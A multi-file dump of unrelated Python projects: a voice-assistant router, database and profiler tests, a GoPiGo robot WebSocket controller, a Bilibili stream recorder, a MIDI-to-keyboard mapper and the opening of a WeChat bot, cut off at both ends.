if 'id' not in message: # if its a new message, it also ensures that it's in proper format
message = log_and_tag(message)
# Do I want these to run independently? Or only perform one function.
if 'core' in message:
print("System functions not yet implemented")
elif 'custom' in message and message['custom'] is not None: # a custom hook. have it run a custom post_office here
print("Doing something custom")
elif 'fallback' in message: # this shouldn't be explicit, per se....
print("Fallback wouldn't be in message. It should be what happens if no parse is found")
elif 'from' in message and message['from'] in message_path: # if it came from the core, and is not a new prompt
# if 'chain' in message: # this is where I add the chain logic
if message['payload'] == "No matches" and message['from'] == "parser":
user_notify("Message: \"%s\" does not match a command"%(message['original']))
elif message['from'] == "parser": # I don't like how this is all being evaluated here. perhaps post_office() should be moved out to a separte file
serial = serialize(message) # serializes with json
command = [formatter,"-f",serial,"-v"]
data = call_application(command) # call application can be found in selflib.py
response = data.decode('utf-8')
print(response)
else:
# if we somehow got here, without going through the command-formatter. Good for testing if you're working on the formatter
user_notify("Payload: %s. It matched a command. It appears we have reached the end"%(message["payload"]))
print("It appears we have reached the end")
else: # This sends the utterance to the parser. What happens after it's parsed? format for cli, and run program.
notify("Unsure what to do, sending to %s"%(message_path[0])) # send it from the start of the pipeline
message['from'] = message_path[0] # append the parser tag to the to/from
command = [PARSER,"-p",message['payload']]
notify("Sending this command: %s"%(command))
notify("%s: %s"%(message_path[0],PARSER))
notify("MESSAGE: %s"%(message['payload']))
payload = call_application(command).decode('utf-8')
message['payload'] = deserialize(payload)
notify(message['payload'])
serial = serialize(message)
# check for next step in config?
message_server(serial)
def log(message): # Later, perhaps... check how inefficient this may be. Also it's not robust
notify("logging %s"%(message))
META_ID = "meta_id"
#meta_id = get_metadata_id_from("metadata") # oh shit, I don't think I need this here
meta_id = 1
table = "logged_input" # moving this up, so it can be overwritable
# Check if the table exists. I can change this so [core] allows for different databases
notify("Checking if table %s exists"%(table)) # this needs to be less hardcoded
command = ["-chk",table]
data = call_database(command)
response = data.decode('utf-8')
# this is a bit hardcoded for a flexable logger
if 'False' in response: # if response == "False" wasn't working. this does
notify("The table does not exist")
# headers = get_utt_id() # this gets the unique_id from the table
# headers += utterance
# headers += get_meta_id() # this gets metadata for the specific table
headers = "utterance" # <- needs meta_id generated. metas primary key
command = ["-t",table,"-c",headers] # utterance needs to be replace w/ config check. this is failing because it needs data to input?
call_database(command) # I am not worried about the callback
command = ["-t",table,"--link-metadata"]
call_database(command) #this is just added in. I could probably just directly link it. I may need a logic change, but this is generic to add to a table later
data = "%s,%s"%(message["payload"],meta_id) # This uses the earlier generated meta_id
# this is actually an enter-and-get-id for the metadata, so I can put the foreign key in the new slot
notify("Sending data to sqldatabase: %s"%(data))
command = ["-t", table, "--insert-and-get-id", data] # I am getting this ID, because it will be used as the message['id']
data = call_database(command)
id = data.decode('utf-8').strip() # the message['id']
message["id"] = id
# insert the data into the table that I just expanded....? that should just be metadata... oh! Its only adding data
#text_command = "INSERT %s IN %s WHERE ID = %d"%(data,table,int(id)) # I need to make this a built in command
#command = ["-t", table, "--text", text_command]
#call_database(command)
notify("Logged %s"%(message["payload"]))
def load_config(): # using configparser
config = configparser.ConfigParser()
try:
config.read('.assistantrc')
except:
notify("There doesn't seem to be a config file...")
os.environ["ASST_DATABASE"] = database # set this externally for other programs to see
os.environ["ASST_BASE"] = base
os.environ["ASST_COMMAND"] = COMMAND
#os.environ["ASST_CONFIG"] = CONFIG
notify("config loaded")
def start_ui(): # You should be a separate process, that listens over the network, and interacts with components over its own shell
subprocess.Popen(["python3",gui]) # This doesn't interact w/ core once started
# Perhaps it DOES interact with core. I just haven't built it yet
def start_stt(): # You should be a separate process that sends things over the network
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# make the socket look like a file
sock.connect(("localhost",9999))
pipefile = sock.makefile('w') # this should be in memeory only. change it to IOFile or something
command = [COMMAND,"sphinx-server.py","-d"]
subprocess.run(command, stdout=pipefile) # this is a special case, as a daemon its always talking to core.
# This should be printing it's STDOUT to the server handler
def start_applications(): # run at the start of core.py
notify("Starting applications")
# start_ui() # start the user iterface
# notify("Started UI")
# start_parser() # parser needs to be a service, due to how padatious loads/trains
# notify("Started Padatious")
# start_stt()
# notify("Started STT")
def install():
# run the bash script for setting up assistatn
shell_out("./setup-database")
def get_record(name): # returns a record in dict format
return run_component([COMMAND,LOOKUP,'-q',name])
def stop_applications():
notify("Stopping applications")
def edit_utterances(): # load a csv file in libreoffice calc to edit. probably will move this out of core
command = [COMMAND,database,"-wc","-t","utterance"]
filename = subprocess.run(command, stdout=subprocess.PIPE)
filename = filename.stdout.decode('utf-8')
os.system("libreoffice --calc -o %s"%(base+filename)) # I need this to trigger an update on next load
def shell_out(filename): # Drop to the editor, for editing core scripts
os.system("emacs %s"%(filename))
def send_over_network(command): # this is just a basic UDP client
# this sends an untagged message to core. how is it handled...
time.sleep(1) # wait until the server has joined the main process.
host, port = "localhost", 9999
data = command
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(data + "\n", "utf-8"), (host, port))
def start_server(): # Start UDP server
HOST, PORT = "localhost", 9999
with socketserver.UDPServer((HOST,PORT), AssistantUDPHandler) as server:
server.serve_forever()
if __name__ == '__main__': # Main program loop
parser = argparse.ArgumentParser(description="main udp server and router")
parser.add_argument('-c', dest='command', help="enter a textual command (as if spoken)")
parser.add_argument('-v', dest='verbose', help="make core verbose", action='store_true')
parser.add_argument('-i', dest='install', help="install a command", action='store_true')
parser.add_argument('-u', dest='utt', help="edit stored utterances", action='store_true')
args = parser.parse_args()
if args.verbose == True:
selflib.verbose = True
load_config()
start_applications() # I need the net_server object, since this becomes the main program. SocketServer UDP runs in its own thread, I suppose (keep an eye out for memory leaks)
# Set up how to handle command line switches. Maybe I need to queue these up..?
if args.install == True: # this may need to be changed if core is the server
install()
exit()
if args.utt is True:
edit_utterances()
if args.command is not None:
message = {}
message['payload'] = args.command
serialized = selflib.serialize(message)
send_internal = Process(target=send_over_network, args=(serialized,), daemon=True) # this doesn't seem to be running separate
send_internal.start() # this is daemonized so that net_server displays it in stdout
notify("Starting Web Server")
start_server()
|
test_cancel.py
|
# Copyright (c) 2019-2021 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from multiprocessing import Process
import pytest
import time
from .base import VerticaPythonIntegrationTestCase
from aiovertica import errors
class CancelTestCase(VerticaPythonIntegrationTestCase):
def test_cursor_cancel(self):
# Cursor.cancel() should be not supported any more
with self._connect() as conn:
cursor = conn.cursor()
with self.assertRaises(errors.NotSupportedError):
cursor.cancel()
def test_connection_cancel_no_query(self):
with self._connect() as conn:
cur = conn.cursor()
# No query is being executed, cancel does nothing
conn.cancel()
@pytest.mark.timeout(30)
def test_connection_cancel_running_query(self):
def cancel_query(conn, delay=5):
time.sleep(delay)
conn.cancel()
with self._connect() as conn:
cur = conn.cursor()
p1 = Process(target=cancel_query, args=(conn,))
p1.start()
with self.assertRaises(errors.QueryCanceled):
long_running_query = ('select count(*) from '
'(select node_name from CONFIGURATION_PARAMETERS) as a cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as b cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as c')
cur.execute(long_running_query)
p1.join()
# Must be able to successfully run next query
cur.execute("SELECT 1")
res = cur.fetchall()
self.assertListOfListsEqual(res, [[1]])
def test_connection_cancel_returned_query(self):
with self._connect() as conn:
cur = conn.cursor()
cur.execute("DROP TABLE IF EXISTS vptest")
try:
# Creating and loading table
cur.execute("CREATE TABLE vptest(id INTEGER, time TIMESTAMP)")
cur.execute("INSERT INTO vptest"
" SELECT row_number() OVER(), slice_time"
" FROM("
" SELECT slice_time FROM("
" SELECT '2021-01-01'::timestamp s UNION ALL SELECT '2022-01-01'::timestamp s"
" ) sq TIMESERIES slice_time AS '1 second' OVER(ORDER BY s)"
" ) sq2")
# This query returns over 30,000,000 rows. We cancel the command after
# reading 100 of them, and then continue reading results. This quickly
# results in an exception being thrown due to the cancel having taken effect.
cur.execute("SELECT id, time FROM vptest")
nCount = 0
with self.assertRaises(errors.QueryCanceled):
while cur.fetchone():
nCount += 1
if nCount == 100:
conn.cancel()
# The number of rows read after the cancel message is sent to the server can vary.
# 100,000 seems to leave a safe margin while still falling well short of
# the 30,000,000+ rows we'd have read if the cancel didn't work.
self.assertTrue(100 <= nCount < 100000)
# Must be able to successfully run next query
cur.execute("SELECT 1")
res = cur.fetchall()
self.assertListOfListsEqual(res, [[1]])
finally:
cur.execute("DROP TABLE IF EXISTS vptest")
exec(CancelTestCase.createPrepStmtClass())
|
CrossPi.py
|
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from gopigo import *
import time
import sys
import subprocess
import os
import threading
import psutil
conns = []
class Leds:
def __init__(self):
print 'Leds Ready'
def on(self):
led_on(LED_L)
led_on(LED_R)
def off(self):
led_off(LED_L)
led_off(LED_R)
# Nécéssite le capteur "Ultrasonic Ranger" de chez DEXTERINDUSTRIES"
class Capteurs:
def __init__(self):
print 'Capteurs Ready'
def ultrasonic(self):
return us_dist(15)
# Nécéssite le capteur de collision de chez GROVE"
# à brancher sur le port D10
class Attitude:
def __init__(self):
print 'Attitude Ready'
def collision(self):
collision_sensor = 10
pinMode(collision_sensor,"INPUT")
return digitalRead(collision_sensor)
#renvoi 1 si aucune collision de détecté, en cas de collision renvoi 0
class Monitor:
def __init__(self):
print 'Monitor Ready'
def volts(self):
return volt()
def cpuSpeed(self):
return psutil.cpu_percent(interval=0.1)
def temperature(self):
temp = os.popen('cat /sys/class/thermal/thermal_zone0/temp').readline()
temp = float(temp) / 1000
temp = round(temp,1)
return temp
class Camera:
cameraStreamerProcess = None
def __init__(self):
if self.cameraStreamerProcess == None or self.cameraStreamerProcess.poll() != None:
self.cameraStreamerProcess = subprocess.Popen( [ "/usr/local/bin/raspberry_pi_camera_streamer" ] )
print 'Camera Ready'
def stop(self):
if self.cameraStreamerProcess != None:
self.cameraStreamerProcess.terminate()
# Nécéssite le Servo-moteur" de chez DEXTERINDUSTRIES"
class ServoMotor:
def __init__(self):
print 'ServoMotor Ready'
servo(90)
time.sleep(1)
disable_servo()
def rotate(self, angle):
angle = 180 - angle
servo(angle)
time.sleep(1.2)
disable_servo()
class Motors:
def __init__(self):
print 'Motors Ready'
stop()
def setBoth(self, left, right):
set_left_speed(left)
set_right_speed(right)
class AutoPilot(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self._etat = False
self._pause = False
def run(self):
self._etat = True
while self._etat:
if self._pause:
time.sleep(0.1)
continue
print 'AutoPilot actif'
time.sleep(1)
print "AutoPilot Stop"
def on(self):
self._pause = False
def off(self):
self._pause = True
def stop(self):
self._etat = False
# Renvoi les infomations système et les données recueilli par les capteurs sur l'interface
class System(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self._etat = False
self._pause = False
def run(self):
self._etat = True
while self._etat:
if self._pause:
time.sleep(0.1)
continue
for conn in conns:
conn.sendMessage(u'Volts '+str(monitor.volts()))
conn.sendMessage(u'Cpu '+str(monitor.cpuSpeed()))
conn.sendMessage(u'Temperature '+str(monitor.temperature()))
conn.sendMessage(u'Ultrasons '+str(capteurs.ultrasonic()))
# conn.sendMessage(u'Collision '+str(attitude.collision()))
time.sleep(.5)
print "System Stop"
def pause(self):
self._pause = True
def resume(self):
self._pause = False
def stop(self):
self._etat = False
class CrossPi(WebSocket):
def handleConnected(self):
conns.append(self)
print self.address, 'connected'
def handleClose(self):
conns.remove(self)
print self.address, 'Disconnected'
def handleMessage(self):
print self.data
module = None
commande = None
argument = None
argument2 = None
cmd = self.data
x = cmd.split(' ')
nb = len(x)
if nb == 1:
module = x[0]
elif nb == 2:
module = x[0]
commande = x[1]
elif nb == 3:
module = x[0]
commande = x[1]
try:
argument = int(x[2])
except ValueError:
argument = x[2]
elif nb == 4:
module = x[0]
commande = x[1]
try:
argument = int(x[2])
except ValueError:
argument = x[2]
try:
argument2 = int(x[3])
except ValueError:
argument2 = x[3]
else:
pass
if module == 'Leds':
if commande != None:
if commande == 'on':
leds.on()
self.sendMessage(u'Leds on')
elif commande == 'off':
leds.off()
self.sendMessage(u'Leds off')
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
elif module == 'Servo':
if commande != None:
if commande == 'Rotate':
if argument != None:
servomotor.rotate(argument)
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
elif module == 'Motors':
if commande != None:
if commande == 'none':
if argument != None:
stop()
elif commande == 'go':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument2)
bwd()
elif commande == 'back':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument2)
fwd()
elif commande == 'rotateLeft':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument)
right_rot()
elif commande == 'rotateRight':
if argument != None:
if argument2 != None:
motors.setBoth(argument, argument)
left_rot()
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
elif module == 'AutoPilot':
if commande != None:
if commande == 'on':
autopilot.on()
self.sendMessage(u'Autopilot on')
elif commande == 'off':
autopilot.off()
self.sendMessage(u'Autopilot off')
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
elif module == 'System':
if commande != None:
if commande == 'pause':
system.pause()
elif commande == 'resume':
system.resume()
elif commande == 'stop':
autopilot.stop()
system.stop()
autopilot.join()
system.join()
time.sleep(0.5)
sys.exit(0)
else:
self.sendMessage(u' ' + commande + ' nest pas une commande de ' + module)
else:
self.sendMessage(u' ' + module + ' necessite une commande')
else:
if module == None:
module = ' '
if commande == None:
commande = ' '
if argument == None:
argument = ' '
if argument2 == None:
argument2 = ' '
self.sendMessage(u' Commande introuvable : ' + module + ' ' + commande + ' ' + str(argument) + ' ' + str(argument2))
if __name__ == '__main__':
leds = Leds()
capteurs = Capteurs()
attitude = Attitude()
monitor = Monitor()
camera = Camera()
servomotor = ServoMotor()
motors = Motors()
autopilot = AutoPilot()
system = System()
# Changez l'Ip par la votre
server = SimpleWebSocketServer('192.168.0.24', 1234, CrossPi)
socket = threading.Thread(target=server.serveforever)
socket.start()
system.start()
autopilot.start()
autopilot.off()
|
MainRunner.py
|
import _thread
import datetime
import logging
import threading
import time
import traceback
from multiprocessing import Process, Value
import utils
from BiliLive import BiliLive
from BiliLiveRecorder import BiliLiveRecorder
from BiliVideoChecker import BiliVideoChecker
from DanmuRecorder import BiliDanmuRecorder
from Processor import Processor
from Uploader import Uploader
class MainRunner():
def __init__(self, config):
self.config = config
self.prev_live_status = False
self.current_state = Value(
'i', int(utils.state.WAITING_FOR_LIVE_START))
self.state_change_time = Value('f', time.time())
if self.config['root']['enable_baiduyun']:
from bypy import ByPy
_ = ByPy()
self.bl = BiliLive(self.config)
self.blr = None
self.bdr = None
def proc(self, config: dict, record_dir: str, danmu_path: str, current_state, state_change_time) -> None:
p = Processor(config, record_dir, danmu_path)
p.run()
if config['spec']['uploader']['record']['upload_record'] or config['spec']['uploader']['clips']['upload_clips']:
current_state.value = int(utils.state.UPLOADING_TO_BILIBILI)
state_change_time.value = time.time()
u = Uploader(p.outputs_dir, p.splits_dir, config)
d = u.upload(p.global_start)
if not config['spec']['uploader']['record']['keep_record_after_upload'] and d.get("record", None) is not None:
rc = BiliVideoChecker(d['record']['bvid'],
p.splits_dir, config)
rc.start()
if not config['spec']['uploader']['clips']['keep_clips_after_upload'] and d.get("clips", None) is not None:
cc = BiliVideoChecker(d['clips']['bvid'],
p.outputs_dir, config)
cc.start()
if config['root']['enable_baiduyun'] and config['spec']['backup']:
current_state.value = int(utils.state.UPLOADING_TO_BAIDUYUN)
state_change_time.value = time.time()
try:
from bypy import ByPy
bp = ByPy()
bp.upload(p.merged_file_path)
except Exception as e:
logging.error('Error when uploading to Baiduyun:' +
str(e)+traceback.format_exc())
if current_state.value != int(utils.state.LIVE_STARTED):
current_state.value = int(utils.state.WAITING_FOR_LIVE_START)
state_change_time.value = time.time()
def run(self):
try:
while True:
if not self.prev_live_status and self.bl.live_status:
start = datetime.datetime.now()
self.blr = BiliLiveRecorder(self.config, start)
self.bdr = BiliDanmuRecorder(self.config, start)
record_process = Process(
target=self.blr.run)
danmu_process = Process(
target=self.bdr.run)
danmu_process.start()
record_process.start()
self.current_state.value = int(utils.state.LIVE_STARTED)
self.state_change_time.value = time.time()
self.prev_live_status = True
record_process.join()
danmu_process.join()
self.current_state.value = int(utils.state.PROCESSING_RECORDS)
self.state_change_time.value = time.time()
self.prev_live_status = False
proc_process = Process(target=self.proc, args=(
self.config, self.blr.record_dir, self.bdr.log_filename, self.current_state, self.state_change_time))
proc_process.start()
else:
time.sleep(self.config['root']['check_interval'])
except KeyboardInterrupt:
return
except Exception as e:
logging.error('Error in Mainrunner:' +
str(e)+traceback.format_exc())
class MainThreadRunner(threading.Thread):
def __init__(self, config):
threading.Thread.__init__(self)
self.mr = MainRunner(config)
def run(self):
self.mr.run()
|
profiler_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import glob
import os
import shutil
import tempfile
import threading
import unittest
from absl.testing import absltest
import jax
import jax.numpy as jnp
import jax.profiler
from jax.config import config
import jax._src.test_util as jtu
try:
import portpicker
except ImportError:
portpicker = None
try:
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as tf_profiler
except ImportError:
profiler_client = None
tf_profiler = None
config.parse_flags_with_absl()
class ProfilerTest(unittest.TestCase):
# These tests simply test that the profiler API does not crash; they do not
# check functional correctness.
def setUp(self):
super().setUp()
self.worker_start = threading.Event()
self.profile_done = False
@unittest.skipIf(not portpicker, "Test requires portpicker")
def testStartServer(self):
port = portpicker.pick_unused_port()
jax.profiler.start_server(port=port)
del port
def testProgrammaticProfiling(self):
with tempfile.TemporaryDirectory() as tmpdir:
try:
jax.profiler.start_trace(tmpdir)
jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(
jnp.ones(jax.local_device_count()))
finally:
jax.profiler.stop_trace()
proto_path = glob.glob(os.path.join(tmpdir, "**/*.xplane.pb"),
recursive=True)
self.assertEqual(len(proto_path), 1)
with open(proto_path[0], "rb") as f:
proto = f.read()
# Sanity check that serialized proto contains host, device, and
# Python traces without deserializing.
self.assertIn(b"/host:CPU", proto)
if jtu.device_under_test() == "tpu":
self.assertIn(b"/device:TPU", proto)
self.assertIn(b"pxla.py", proto)
def testProgrammaticProfilingErrors(self):
with self.assertRaisesRegex(RuntimeError, "No profile started"):
jax.profiler.stop_trace()
try:
with tempfile.TemporaryDirectory() as tmpdir:
jax.profiler.start_trace(tmpdir)
with self.assertRaisesRegex(
RuntimeError,
"Profile has already been started. Only one profile may be run at a "
"time."):
jax.profiler.start_trace(tmpdir)
finally:
jax.profiler.stop_trace()
def testProgrammaticProfilingContextManager(self):
with tempfile.TemporaryDirectory() as tmpdir:
with jax.profiler.trace(tmpdir):
jax.pmap(lambda x: jax.lax.psum(x + 1, 'i'), axis_name='i')(
jnp.ones(jax.local_device_count()))
proto_path = glob.glob(os.path.join(tmpdir, "**/*.xplane.pb"),
recursive=True)
self.assertEqual(len(proto_path), 1)
with open(proto_path[0], "rb") as f:
proto = f.read()
# Sanity check that serialized proto contains host and device traces
# without deserializing.
self.assertIn(b"/host:CPU", proto)
if jtu.device_under_test() == "tpu":
self.assertIn(b"/device:TPU", proto)
def testTraceAnnotation(self):
x = 3
with jax.profiler.TraceAnnotation("mycontext"):
x = x + 2
def testTraceFunction(self):
@jax.profiler.annotate_function
def f(x, *, y):
return x + 2 * y
self.assertEqual(f(7, y=3), 13)
@jax.profiler.annotate_function
def f(x, *, name):
return x + 2 * len(name)
self.assertEqual(f(7, name="abc"), 13)
@partial(jax.profiler.annotate_function, name="aname")
def g(x):
return x + 2
self.assertEqual(g(7), 9)
@partial(jax.profiler.annotate_function, name="aname", akwarg="hello")
def h(x):
return x + 2
self.assertEqual(h(7), 9)
def testDeviceMemoryProfile(self):
x = jnp.ones((20,)) + 7.
self.assertIsInstance(jax.profiler.device_memory_profile(), bytes)
del x
def _check_xspace_pb_exist(self, logdir):
path = os.path.join(logdir, 'plugins', 'profile', '*', '*.xplane.pb')
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
@unittest.skip("Test causes OOMs")
@unittest.skipIf(not (portpicker and profiler_client and tf_profiler),
"Test requires tensorflow.profiler and portpicker")
def testSingleWorkerSamplingMode(self, delay_ms=None):
def on_worker(port, worker_start):
# Must keep return value `server` around.
server = jax.profiler.start_server(port) # noqa: F841
worker_start.set()
x = jnp.ones((1000, 1000))
while True:
with jax.profiler.TraceAnnotation("atraceannotation"):
jnp.dot(x, x.T).block_until_ready()
if self.profile_done:
break
def on_profile(port, logdir, worker_start):
worker_start.wait()
options = tf_profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=2,
device_tracer_level=1,
delay_ms=delay_ms,
)
# Request for 1000 milliseconds of profile.
duration_ms = 1000
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms,
'', 1000, options)
self.profile_done = True
logdir = absltest.get_default_test_tmpdir()
# Remove any existing log files.
shutil.rmtree(logdir, ignore_errors=True)
port = portpicker.pick_unused_port()
thread_profiler = threading.Thread(
target=on_profile, args=(port, logdir, self.worker_start))
thread_worker = threading.Thread(
target=on_worker, args=(port, self.worker_start))
thread_worker.start()
thread_profiler.start()
thread_profiler.join()
thread_worker.join(120)
self._check_xspace_pb_exist(logdir)
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
midiator.py
|
from midi.midi_io import find_device
from midi.midi_enums import Notes
from windows.windows_enums import KeyFlags, DICodes, MouseFlags, MouseDirections
from windows.windows_io import send_key_event, send_mouse_movement_event, send_mouse_button_event
import threading
import time
from math import sin
class MIDIator:
def __init__(self, midi_identifier, key_binds, mouse_movement_binds, mouse_button_binds,
midi_channel=0, mouse_sensitivity=4, mouse_refresh=0.005, verbose=True):
"""
Constructor for MIDIator.
:param midi_identifier: A string unique to the desired MIDI device.
:param key_binds: A dictionary of the form {Notes.<note>: DICodes.<code>}.
:param mouse_movement_binds: A dictionary of the form {Notes.<note>: MouseDirections.<direction>}.
:param mouse_button_binds: A dictionary of the form
{Notes.<note>: (MouseFlags.<press-flag>, MouseFlags.<release-flag>)}.
:param midi_channel: The channel on which to listen for events (default: 0).
:param mouse_sensitivity: The amount by which to move the mouse every time mouse_refresh elapses (default: 4).
:param mouse_refresh: The time to wait between every mouse position update (default: 5ms) .
:param verbose: Whether or not to print log messages (default: True).
"""
self.verbose = verbose
self.log("{+} Initializing MIDIator...")
self.key_binds = key_binds
self.mouse_movement_binds = mouse_movement_binds
self.mouse_button_binds = mouse_button_binds
self.log(f" > Connecting to MIDI controller by identifier \"{midi_identifier}\"... ", end="")
self.midi_port = find_device(midi_identifier)
self.midi_channel = midi_channel
self.log("Done.")
self.mouse_sensitivity = mouse_sensitivity
self.mouse_refresh = mouse_refresh
self.mouse_vector = [0, 0]
self.log(" > Initialization complete. ")
def log(self, *args, **kwargs):
"""
Prints a message to the screen if the verbose flag is set.
:param args: The args to pass down to print().
:param kwargs: The keyword arguments to pass down to print().
"""
if self.verbose:
print(*args, **kwargs)
def start(self):
"""
Starts handling MIDI messages and translating them into Windows input.
"""
self.log("{+} Spawning mouse handler thread... ", end="")
mouse_thread = threading.Thread(target=self.mouse_handler)
mouse_thread.start()
self.log("Done.")
self.log("{+} Handling MIDI events...")
for message in self.midi_port:
self.triage_message(message)
def mouse_handler(self):
"""
A function that automates moving the mouse, since each mouse movement is atomic.
"""
sin_45 = sin(45)
while True:
x, y = self.mouse_vector
if abs(x) == abs(y) and x != 0:
x = x * sin_45
y = y * sin_45
x, y = int(x), int(y)
send_mouse_movement_event(x, y)
time.sleep(self.mouse_refresh)
def triage_message(self, message):
"""
Sends messages to their relevant handlers, or does nothing if irrelevant.
:param message: A MIDI message.
"""
if message.channel == self.midi_channel and "note_" in message.type:
if message.type == "note_on":
self.log(f" > Received MIDI code {message.note} ({Notes(message.note).name:3}) -> ", end="")
if message.note in self.key_binds:
self.translate_keystroke(message)
elif message.note in self.mouse_movement_binds:
self.translate_mouse_move(message)
elif message.note in self.mouse_button_binds:
self.translate_mouse_button(message)
elif message.type == "note_on":
self.log("Key not bound.")
def translate_keystroke(self, message):
"""
Triggers a keyboard event based on the contents of a MIDI message.
:param message: A "note_on" or "note_off" MIDI message.
"""
if message.type == "note_on":
self.log(f"Key {self.key_binds[message.note].name}")
direct_input_key = self.key_binds[message.note]
#flag = KeyFlags.PRESS if message.type == "note_on" else KeyFlags.RELEASE
"Extended support for devices that send note_on with 0 velocity instead of note_off"
flag = KeyFlags.PRESS if (message.type == "note_on") & (message.velocity != 0) else KeyFlags.RELEASE
send_key_event(direct_input_key, flag)
def translate_mouse_move(self, message):
"""
Modifies the mouse movement vector based on the contents of a MIDI message.
:param message: A "note_on" or "note_off" MIDI message.
"""
if message.type == "note_on":
self.log(f"Mouse {self.mouse_movement_binds[message.note].name}")
x, y = self.mouse_movement_binds[message.note]
#polarity = 1 if message.type == "note_on" else -1
"Extended support for devices that send note_on with 0 velocity instead of note_off"
polarity = 1 if (message.type == "note_on") & (message.velocity != 0) else -1
self.mouse_vector[0] += polarity * x * self.mouse_sensitivity
self.mouse_vector[1] += polarity * y * self.mouse_sensitivity
def translate_mouse_button(self, message):
"""
Triggers a mouse button event based on the contents of a MIDI message.
:param message: A "note_on" or "note_off" MIDI message.
"""
if message.type == "note_on":
self.log(f"Mouse {self.mouse_button_binds[message.note][0].name}")
click_flag, release_flag = self.mouse_button_binds[message.note]
#flag = click_flag if message.type == "note_on" else release_flag
"Extended support for devices that send note_on with 0 velocity instead of note_off"
flag = click_flag if (message.type == "note_on") & (message.velocity != 0) else release_flag
send_mouse_button_event(flag)
if __name__ == "__main__":
#####################################################
# U S E R C O N F I G U R A T I O N B E L O W #
#####################################################
# A string unique to the MIDI controller to connect to
identifier = "Digital Keyboard"
# Map from MIDI key codes to DirectInput key codes
# Note: "S" in a note name signifies "#" or "sharp"
default_key_binds = {
Notes.FS3: DICodes.W,
Notes.E3: DICodes.A,
Notes.F3: DICodes.S,
Notes.G3: DICodes.D,
Notes.D3: DICodes.LSHIFT,
Notes.A3: DICodes.SPACE,
Notes.GS3: DICodes.R
}
genshin_key_binds = {
Notes.C4: DICodes.Z,
Notes.D4: DICodes.X,
Notes.E4: DICodes.C,
Notes.F4: DICodes.V,
Notes.G4: DICodes.B,
Notes.A4: DICodes.N,
Notes.B4: DICodes.M,
Notes.C5: DICodes.A,
Notes.D5: DICodes.S,
Notes.E5: DICodes.D,
Notes.F5: DICodes.F,
Notes.G5: DICodes.G,
Notes.A5: DICodes.H,
Notes.B5: DICodes.J,
Notes.C6: DICodes.Q,
Notes.D6: DICodes.W,
Notes.E6: DICodes.E,
Notes.F6: DICodes.R,
Notes.G6: DICodes.T,
Notes.A6: DICodes.Y,
Notes.B6: DICodes.U
}
# Map from MIDI key codes to mouse movement directions
default_mouse_movement_binds = {
Notes.E4: MouseDirections.LEFT,
Notes.F4: MouseDirections.DOWN,
Notes.FS4: MouseDirections.UP,
Notes.G4: MouseDirections.RIGHT,
}
no_mouse_movement_binds = {
}
# Map from MIDI key codes to mouse button flags
# The first flag is the pressed flag, the second is the released flag
default_mouse_button_binds = {
Notes.D4: (MouseFlags.LEFT_CLICK, MouseFlags.LEFT_RELEASE),
Notes.A4: (MouseFlags.RIGHT_CLICK, MouseFlags.RIGHT_RELEASE)
}
no_mouse_button_binds = {
}
#####################################################
# E N D U S E R C O N F I G U R A T I O N #
#####################################################
# Initializing and starting MIDIator
midiator = MIDIator(identifier, genshin_key_binds, no_mouse_movement_binds, no_mouse_button_binds)
midiator.start()
|
main.py
|
import itchat
from itchat.content import *
import os
import traceback
import re
from modules.__config__ import multi_process, terminal_QR
if multi_process:
from multiprocessing import Process
else:
from modules.__stoppable__ import Process
if __name__ == "__main__":
# load modules in ./modules folder
modules = dict()
for file in os.listdir(os.path.join(os.path.dirname(__file__), 'modules')):
if file.find('__') > -1:
continue
if file.find('.py') > -1:
module_name = file.split('.')[0]
# import the main class
mod = getattr(__import__('modules.' + module_name, fromlist=['*']), module_name)
# create command key
modules[mod.alias] = mod
print(modules)
# dictionaries which store user sessions objects (interaction) and processes (static call)
session_objects = dict()
session_processes = dict()
@itchat.msg_register(TEXT)
def msg_listener(msg):
global session_objects, session_processes
# when new commands are received
cmd = msg['Text']
from_user = msg['FromUserName']
# get the user session
current_process_info = session_processes.get(from_user)
current_object = session_objects.get(from_user)
if current_process_info is not None:
if current_process_info[0].is_alive():
if cmd == '/q':
current_process_info[0].terminate()
itchat.send_msg("{} is terminated".format(current_process_info[1]), from_user)
del session_processes[from_user]
return
else:
itchat.send_msg("{} is running".format(current_process_info[1]), from_user)
return
else:
del session_processes[from_user]
